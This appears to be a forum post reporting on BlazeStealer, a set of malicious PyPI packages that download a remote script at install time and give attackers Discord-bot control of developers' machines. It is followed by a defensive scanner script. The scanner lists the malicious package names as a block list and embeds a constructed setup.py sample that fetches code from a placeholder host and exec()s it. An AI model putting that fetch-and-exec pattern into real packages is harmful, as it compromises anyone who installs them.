Lord777
A new set of malicious Python packages, whose authors want to steal confidential information from software developers' devices, has entered the Python Package Index (PyPI) repository. The malware was combined under the common name BlazeStealer.
According to Checkmarx experts who discovered the cyber threat, the packages are disguised as seemingly secure obfuscation tools.
"BlazeStealer is able to download additional malicious script from a third-party source. This script activates the Discord bot, which gives the attacker full access to the victim's computer," the researchers write in the report.
Apparently, this campaign was launched in January 2023, with a total of eight packages participating: Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood. The latter dates back to October.
Each of these packages has setup.py and init.py files, whose task is to pull a Python script hosted on transfer[.]sh. After installation, this script is executed immediately.
As noted above, BlazeStealer uses the Discord bot and allows authors to collect a whole range of important data (including passwords from browsers), take screenshots, execute arbitrary commands, encrypt files, and even disable the Microsoft Defender antivirus built into Windows.
Moreover, the malware can seriously complicate or make it impossible to work with the computer due to inadequate consumption of CPU resources, as well as put a Batch script in the autorun directory to turn off the device and even cause a blue screen of death (BSoD).
In total, the packages were downloaded 2,438 times, with the largest number of downloads coming from China, Russia, Ireland, Hong Kong, Croatia, France and Spain.
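A defensive check for the behaviour described in the post, added here as an example (it is not from the post or from the Checkmarx report): it matches a requirements list against the eight package names given above and statically inspects install-time code such as setup.py or init.py for a download call combined with a code-execution call, without importing or running the file. The function names, the heuristic call-name lists and the sample input are assumptions made for illustration.

```python
import ast
import re

# Package names listed in the post, lower-cased for PEP 503 style comparison.
REPORTED = {"pyobftoexe", "pyobfusfile", "pyobfexecute", "pyobfpremium",
            "pyobflite", "pyobfadvance", "pyobfuse", "pyobfgood"}
# Heuristic call names (assumption): broad on purpose, so expect false positives.
FETCH = {"urlopen", "urlretrieve", "get", "post", "request"}
RUN = {"exec", "eval", "system", "popen", "Popen", "run", "call", "check_output"}
URL = re.compile(r"https?://([^/\s'\"]+)")

def normalise(name):
    return re.sub(r"[-_.]+", "-", name).lower()

def reported_requirements(lines):
    """Return names from requirements.txt-style lines that match the post's list."""
    hits = []
    for line in lines:
        name = re.split(r"[\s=<>!~;\[#]", line.strip(), maxsplit=1)[0]
        if name and normalise(name) in REPORTED:
            hits.append(name)
    return hits

def audit_source(source):
    """Parse install-time code with ast (never executes it) and report findings."""
    fetch, run, hosts = [], [], set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            f = node.func
            name = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")
            if name in FETCH:
                fetch.append((name, node.lineno))
            elif name in RUN:
                run.append((name, node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            hosts.update(URL.findall(node.value))
    return {"fetch": sorted(fetch), "run": sorted(run), "hosts": sorted(hosts),
            "fetch_and_run": bool(fetch and run)}

# Constructed sample of a setup.py with the download-then-execute shape; it is
# only parsed as text here, and the host is a reserved .invalid name.
SAMPLE = '''
import urllib.request
from setuptools import setup
code = urllib.request.urlopen("https://files.example.invalid/stage2.py").read()
exec(code)
setup(name="demo", version="0.1")
'''

if __name__ == "__main__":
    print(audit_source(SAMPLE))
```

A `fetch_and_run` hit is a reason to review the package by hand before installing it, not proof of malice, since legitimate build scripts also download files and spawn processes.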